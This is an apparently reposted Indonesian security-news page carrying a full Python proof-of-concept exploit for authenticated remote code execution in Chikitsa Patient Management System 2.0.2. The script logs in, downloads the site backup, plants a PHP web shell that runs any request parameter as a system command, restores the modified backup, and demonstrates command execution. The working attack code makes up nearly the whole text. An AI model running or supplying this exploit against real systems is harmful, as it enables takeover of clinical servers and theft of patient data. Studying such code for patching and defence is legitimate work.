Sistem Manajemen Pasien Chikitsa 2.0.2 Eksekusi Kode Jarak Jauh Cadangan

  • Whatsapp
Sistem Manajemen Pasien Chikitsa 2.0.2 Eksekusi Kode Jarak Jauh Cadangan
Sistem Manajemen Pasien Chikitsa Eksekusi Kode Jarak Jauh Cadangan

News.nextcloud.asia

Sistem Manajemen Pasien Chikitsa versi 2.0.2 mengalami kerentanan eksekusi kode jarak jauh terautentikasi terkait cadangan.

MD5 | 27d9f9022be23e17e9a61b08c1278e0a

# Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)
# Date: 03/12/2021
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/
# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download
# Version: 2.0.2
# Tested on: Ubuntu

import requests
import os
from zipfile import ZipFile
import argparse

def login(session , target , username , password):
print("[+] Attempting to login with the credential")
url = target + "/index.php/login/valid_signin"
login_data = {"username" : username , "password" : password}
session.post(url , data=login_data , verify=False)
return session

def download_backup( session , target):
print("[+] Downloading the backup (This may take some time)")
url = target + "/index.php/settings/take_backup/"
backup_req = session.get(url , verify=False)
global tmp_dir
tmp_dir = os.popen("mktemp -d").read().rstrip()
open(tmp_dir + "/backup_raw.zip" , "wb").write(backup_req.content)
print(f"[+] Backup downloaded at {tmp_dir}/backup_raw.zip")

def modify_backup():
print("[+] Modifying the backup by injecting a backdoor.")
zf = ZipFile(f'{tmp_dir}/backup_raw.zip', 'r')
zf.extractall(tmp_dir)
zf.close()
open(tmp_dir + "/uploads/media/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>")
os.popen(f"cd {tmp_dir}/ && zip -r backup_modified.zip chikitsa-backup.sql prefix.txt uploads/").read()

def upload_backup(session , target):
print("[+] Uploading the backup back into the server.(This may take some time)")
url = target + "/index.php/settings/restore_backup"
file = open(f"{tmp_dir}/backup_modified.zip" , "rb").read()
session.post(url , verify=False ,files = {"backup" : ("backup-modified.zip" , file)})
print(f"[+] Backdoor Deployed at : {target}/uploads/restore_backup/uploads/media/rce.php")
print(f"[+] Example Output : {requests.get(target +'/uploads/restore_backup/uploads/media/rce.php?cmd=id' , verify=False).text}")

def main():
parser = argparse.ArgumentParser("""
__ _ __ _ __
_____/ /_ (_) /__(_) /__________ _
/ ___/ __ / / //_/ / __/ ___/ __ `/
/ /__/ / / / / ,< / / /_(__ ) /_/ /
___/_/ /_/_/_/|_/_/__/____/__,_/

Chikitsa Patient Management System 2.0.2 Authenticated Remote Code Execution :
POC Written By - 0z09e (https://twitter.com/0z09e)nn""" , formatter_class=argparse.RawTextHelpFormatter)
req_args = parser.add_argument_group('required arguments')
req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")
req_args.add_argument("-u" , "--username" , help="Username" , required=True)
req_args.add_argument("-p" , "--password" , help="password", required=True)
args = parser.parse_args()

target = args.URL
if target[-1] == "/":
target = target[:-1]
username = args.username
password = args.password

session = requests.session()
login(session ,target , username , password)
download_backup(session , target )
modify_backup()
upload_backup(session , target)

if __name__ == "__main__":
main()

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.